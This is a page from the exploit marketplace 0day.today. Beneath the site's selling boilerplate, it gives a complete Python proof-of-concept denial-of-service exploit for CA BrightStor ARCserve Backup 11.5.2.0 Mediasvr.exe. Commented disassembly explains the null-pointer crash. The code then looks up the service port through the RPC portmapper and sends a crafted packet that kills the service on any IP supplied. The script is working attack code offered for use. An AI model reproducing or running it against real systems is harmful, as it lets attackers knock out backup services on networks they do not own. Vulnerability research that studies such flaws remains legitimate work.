0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
CA BrightStor Backup 11.5.2.0 Mediasvr.exe Denial of Service Exploit
[====================================================================
CA BrightStor Backup 11.5.2.0 Mediasvr.exe Denial of Service Exploit
====================================================================
#!/usr/bin/python
#
# Computer Associates (CA) Brightstor Backup Mediasvr.exe DoS (catirpc.dll/rwxdr.dll)
# (Previously Unknown)
#
# There is an issue with RPC operation 126 and the imported cactirpc.dll
# and rwxdr.dll. It looks as if Mediasvr.exe identifies a Bad Job Handle
# as seen in its log file.
#
# Log Message:
# asms_manager_job_enumerate_devices_1_svc(): Bad Job Handle.
#
# However, the process dies when trying to send an RPC response
# for the bad job handle. This is caused be a null memory dereference.
# Within cactirpc.dll, the xdr_rwpair function is called:
#
# Catirpc.dll:2E008A93 loc_2E008A93:
# Catirpc.dll:2E008A93 mov ecx, [esi+10h]
# Catirpc.dll:2E008A96 push ecx <- ECX is 0x0041B310 (nulls)
# Catirpc.dll:2E008A97 push edi <- EDI is 0x009e2580 (nulls)
# Catirpc.dll:2E008A98 call dword ptr [esi+14h] <-points to 0x2d6054f0
# Catirpc.dll:2E008A9B add esp, 8 (rwxdr.dll:xdr_rwpair)
# Catirpc.dll:2E008A9E pop edi
# Catirpc.dll:2E008A9F pop esi
# Catirpc.dll:2E008AA0 pop ebx
# Catirpc.dll:2E008AA1 retn
#
# rwxdr.dll:xdr_rwpair
# .text:2D6054F0 public xdr_rwpair
# .text:2D6054F0 xdr_rwpair proc near
# .text:2D6054F0
# .text:2D6054F0 arg_0= dword ptr 4
# .text:2D6054F0 arg_4= dword ptr 8
# .text:2D6054F0
# .text:2D6054F0 push ebx
# .text:2D6054F1 mov ebx, [esp+4+arg_4] <---puts 0x0041B310
# .text:2D6054F5 push esi
# .text:2D6054F6 push edi
# .text:2D6054F7 mov edi, [esp+0Ch+arg_0] <--- puts 0x009e2580
# .text:2D6054FB mov esi, [ebx] <---- EBX is 0x00000000
# .text:2D6054FD mov eax, [edi] <---- EDI is 0x00000000
# .text:2D6054FF test eax, eax
# .text:2D605501 jnz short loc_2D605533
# .text:2D605503 mov eax, [esi+4] <---- ESI is set to 0x00000000
#
# This was tested on BrightStor ARCserve Backup 11.5.2.0 (SP2) with the latest
# CA patches on Windows XP SP2
#
# CA has been notified
#
# Author: M. Shirk
#
# (c) Copyright 2007 (Shirkdog Security) shirkdog_list $ at % hotmail dot com
#
# Use at your own Risk: You have been warned
#------------------------------------------------------------------------
import os
import sys
import time
import socket
import struct
#------------------------------------------------------------------------
#Start of RPC Packet
rpc_packet="\x80\x00\x00\x5c\x6b\x9b\x72\xbc\x00\x00\x00\x00\x00\x00\x00\x02"
#Program ID, and Operation 126
rpc_packet+="\x00\x06\x09\x7e\x00\x00\x00\x01\x00\x00\x00\x7e"
#nulls after Operation
rpc_packet+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
#4 more bytes of junk (ALL HAIL BEEF)
rpc_packet+="\xde\xad\xbe\xef"
# Need to get the port Mediasvr.exe is listening on
rpc_portmap_req="\x80\x00\x00\x38\x21\x84\xf7\xc9\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xa0\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x09\x7e\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x00"
#------------------------------------------------------------------------
def ExploitMediaSvr(target,port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, port))
sock.send(rpc_packet)
sock.close()
print '[+] Done...\n[+] Mediasvr.exe is dead\n[+] ... or it will die in a few seconds for you inpatient bastards\n'
def GetMediaSvrPort(target):
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((target,111))
sock.send(rpc_portmap_req)
rec = sock.recv(256)
port1 = rec[-4]
port2 = rec[-3]
port3 = rec[-2]
port4 = rec[-1]
port1 = hex(ord(port1))
port2 = hex(ord(port2))
port3 = hex(ord(port3))
port4 = hex(ord(port4))
port = '%02x%02x%02x%02x' % (int(port1,16),int(port2,16),int(port3,16),int(port4,16))
port = int(port,16)
print '[+] Sending TCP Packet of Death to Target: %s Port: %s' % (target,port)
ExploitMediaSvr(target,port)
if __name__=="__main__":
try:
target = sys.argv[1]
except IndexError:
print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe DoS (catirpc.dll/rwxdr.dll)'
print '[+] Author: Shirkdog'
print '[+] Usage: %s <target ip>\n' % sys.argv[0]
sys.exit(-1)
print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe DoS (catirpc.dll/rwxdr.dll)'
print '[+] Author: Shirkdog'
GetMediaSvrPort(target)
# 0day.today [2024-11-15] #